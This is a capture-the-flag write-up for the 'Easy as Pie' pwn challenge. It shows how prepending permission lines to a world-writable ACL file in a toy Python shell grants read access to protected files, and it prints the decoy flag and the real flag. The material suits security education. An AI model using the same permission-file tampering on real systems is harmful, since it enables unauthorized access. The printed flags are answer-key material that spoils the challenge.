## Easy as Pie

* **Category:**  Pwn
* **Points:** 300
* **Author(s):** b0uldrr
* **Date:** 4/4/20

---

### Challenge
```
My friend just spent hours making this custom shell! He's still working on it so it doesn't have much. But we can do some stuff! He even built a custom access control list for controlling if you can access files.
Check it out!
nc challenges.auctf.com 30010

Author: kensocolo
```

---

### Solution
Connecting to the remote server, we see we have 4 commands at our disposal: cat, help, ls and write.

```
tmp@localhost:~/ctf/midnightsun/admpanel$ nc challenges.auctf.com 30010
Welcome to my custom shell written in Python! To get started type `help`
user@pyshell$ help

Use help <command> for help on specific command.
================================================
cat  help  ls  write

user@pyshell$ help cat

        View contents of file
        
user@pyshell$ help ls

        List files in current directory.
        Can type `ls hidden` to view hidden files
        
user@pyshell$ help write

        write <content> <filename>
        adds content to the beginning of the file.
```

Using ls, we can see 3 files. Trying to cat the flag file prompts that we don't have permission:

``` 
user@pyshell$ ls
acl.txt
user.txt
flag.txt

user@pyshell$ cat flag.txt
Don't have da permzzz
```

Looking at acl.txt, which determines permissions for each file, we can see that flag.txt is only read/writeable by the owner - root. However, we can also see that acl.txt is editable by all users (permission 606):

```
user@pyshell$ cat acl.txt
user.txt:user:600
.acl.txt:root:600
.flag.txt:user:600
flag.txt:root:600
acl.txt:root:606
```

Let's try to edit th acl file using the write command and add our own permission at the top for flag.txt:

```
user@pyshell$ write flag.txt:user:666 acl.txt
flag.txt:user:666

user@pyshell$ cat acl.txt
flag.txt:user:666
user.txt:user:600
.acl.txt:root:600
.flag.txt:user:600
flag.txt:root:600
acl.txt:root:606

user@pyshell$ cat flag.txt
aUctf_{h3y_th3_fl4g}
```

In the example above, we can see that we added a new line to flag.txt and were able to successfully read from flag.txt with cat. Unfortunately this flag wasn't the real flag :(

The acl.txt file also lists a .acl.txt file which we don't have permission to. Let's try editing the acl.txt file again to read the contents of .acl.txt:

```
user@pyshell$ cat .acl.txt
Don't have da permzzz

user@pyshell$ write .acl.txt:user:666 acl.txt
.acl.txt:user:666

user@pyshell$ cat .acl.txt
auctf{h4_y0u_g0t_tr0ll3d_welC0m#_t0_pWN_l@nd}

```

---

**Flag** 
```
auctf{h4_y0u_g0t_tr0ll3d_welC0m#_t0_pWN_l@nd}
```

